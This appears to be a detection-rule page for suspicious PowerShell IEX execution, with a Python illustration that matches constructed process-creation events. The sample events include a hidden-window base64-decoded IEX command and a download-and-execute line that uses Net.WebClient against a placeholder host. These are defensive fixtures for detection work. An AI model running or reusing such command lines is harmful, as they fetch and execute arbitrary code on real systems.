Suspicious PowerShell IEX Execution Patterns

Summary
This detection rule identifies potentially malicious execution patterns associated with PowerShell's Invoke-Expression (IEX) alias. It inspects the command-line arguments passed to the PowerShell and pwsh binaries for behaviour that indicates an intent to execute arbitrary code, looking for the IEX alias coupled with various command constructs that could indicate an attempt to obfuscate malicious activity. Common patterns seen in exploitation attempts are matched through a mix of combined selections (several strings that must appear together) and standalone selections (a single string that is suspicious on its own). The rule provides high-confidence alerts while acknowledging the risk of false positives from legitimate scripts that also use IEX in normal operation. It requires Windows process creation logs as input, so collecting those logs is a prerequisite for monitoring PowerShell activity that attackers may abuse. Overall, the rule helps mitigate the risk posed by common attack techniques that use PowerShell to execute payloads.
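As an added illustration that is not the rule's own logic, the following Python reproduces the combined-versus-standalone selection structure described above over constructed process-creation events. The image names, construct strings and standalone patterns are assumptions chosen for illustration, not the rule's actual selection strings.

```python
import re

# Constructed process-creation events (image, command line); not taken from the page.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX ([Text.Encoding]::UTF8.GetString("
     "[Convert]::FromBase64String('QUJD')))\""),
    ("C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "pwsh -c \"iex (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')\""),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -c \"iex (Get-Content .\\profile.ps1 -Raw)\""),  # IEX alone, no construct
    ("C:\\Windows\\System32\\cmd.exe",
     "cmd /c echo iex FromBase64String"),                            # not a PowerShell image
]

# Only PowerShell / pwsh process creations are in scope for the rule.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
IEX_ALIAS = re.compile(r"\biex\b", re.IGNORECASE)

# Assumed illustrative constructs: a combined selection fires only when the IEX
# alias appears together with one of these in the same command line.
COMBINED_CONSTRUCTS = ("::frombase64string(", "new-object ", "-join", "$env:")
# Assumed standalone selections: each string is treated as suspicious on its own.
STANDALONE_PATTERNS = ("iex ([text.encoding]::", "iex ([system.text.encoding]::", "| iex")


def matches_rule(image, command_line):
    """Return the name of the first selection that fires, or None if nothing matches."""
    if not image.lower().endswith(POWERSHELL_IMAGES):
        return None
    cl = command_line.lower()
    for pat in STANDALONE_PATTERNS:           # standalone selections: one string suffices
        if pat in cl:
            return "standalone:" + pat
    if IEX_ALIAS.search(cl):                  # combined selections: IEX plus a construct
        for construct in COMBINED_CONSTRUCTS:
            if construct in cl:
                return "combined:iex+" + construct
    return None


def triage(events):
    """Map each command line to the selection that fired, keeping only the hits."""
    return {cl: hit for image, cl in events if (hit := matches_rule(image, cl))}
```

The third event shows why plain IEX use by legitimate scripts does not fire by itself: the alias must be coupled with one of the constructs.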
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2022-03-24